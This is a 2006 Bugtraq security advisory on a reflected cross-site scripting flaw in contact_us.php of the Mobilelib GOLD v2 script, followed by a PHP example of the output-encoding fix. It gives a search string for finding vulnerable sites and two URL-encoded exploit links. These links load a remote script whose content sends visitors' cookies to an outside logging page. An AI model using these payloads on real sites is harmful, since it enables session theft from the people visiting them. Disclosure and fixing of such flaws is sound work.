
XSS in script Mobilelib GOLD v2

To: bugtraq@securityfocus.com
Subject: XSS in script Mobilelib GOLD v2
From: gamr-14@hotmail.com
Date: 28 Dec 2006 23:44:22 -0000
/////////////////////////////////////
// XSS in script Mobilelib GOLD v2 //
/////////////////////////////////////
Found By: viP HaCKEr
Team : AL-GaRNi
Vendor: http://www.ac4p.com
Software: Mobilelib GOLD v2
Google : "Powered by ac4p.com"
::::::::::::::::::::::::::::::::::::::
Description:

Line 32 of contact_us.php
:::::::::::::::::::::::::::::::::::::
code:
}
$html=getthemeM("show.tpl");
$html=eregi_replace("{marquee}","$Newnews",$html);
include("block.php");
$errr='';
function chek_mail($email)
   {
::::::::::::::::::::::::::::::::::::::
Exploits :

http://[target]/[path]/contact_us.php?email=%20%22%3E%3Cscript%20src%3Dhttp%3A//www.xxxx.com/swt.js%3E%3C/script%3E

//and

http://[target]/[path]/contact_us.php?errr=%20%22%3E%3Cscript%20src%3Dhttp%3A//www.xxxx.com/swt.js%3E%3C/script%3E
/****************************************************************//
//Content swt.js
location.href='http://www.yoursite.com/log.php?swt='+escape(document.cookie);

//End swt.js
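The advisory above reports that the email and errr query parameters of contact_us.php are reflected into the page without encoding. The following PHP is an added illustration of the fix, not the vendor's code: it assumes a template with {email} and {errr} placeholders (hypothetical names) and shows HTML-context encoding plus validation at the point of output.

```php
<?php
// Added example (not from Mobilelib GOLD): how contact_us.php should treat the
// two reflected parameters named in the advisory. Assumed, hypothetical pattern of
// the vulnerable code, which the advisory's URLs target:
//   $html = eregi_replace("{email}", "$_GET[email]", $html);  // raw input into HTML
// eregi_replace was removed in PHP 7; str_replace is used for the placeholders here.

function safe_html(string $value): string {
    // ENT_QUOTES encodes both ' and ", so a value cannot break out of an
    // attribute such as value="..."; < and > are encoded as well.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_contact_form(array $get, string $html): string {
    $email = isset($get['email']) ? (string) $get['email'] : '';
    $errr  = isset($get['errr'])  ? (string) $get['errr']  : '';

    // Validate the address instead of trusting it; an invalid one is reported,
    // and the untrusted value is not echoed back at all.
    if ($email !== '' && filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        $errr  = 'Invalid e-mail address';
        $email = '';
    }

    // Every placeholder receives encoded output, whatever its source.
    return str_replace(
        ['{email}', '{errr}'],
        [safe_html($email), safe_html($errr)],
        $html
    );
}

// Constructed template and request, standing in for show.tpl and the query string.
$template = '<input name="email" value="{email}"><div class="err">{errr}</div>';
$request  = [
    'email' => 'user@example.invalid',
    'errr'  => '"><script src=http://example.invalid/x.js></script>',
];

echo render_contact_form($request, $template), PHP_EOL;
// The quote and angle brackets come out as &quot; &gt; &lt; so no script element
// is created; the same function neutralises the email parameter.
```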
############### Group AL-GaRNi ##################
/**********************************************#
/*SwEET-DeViL  &  viP HaCkEr  &   HaCkEr sUn *#
/********************************************#
#################(c)@2006####################
########## gamr-14@hotmail.com #############
########## Error-404@hotmail.com ##########
##########################################
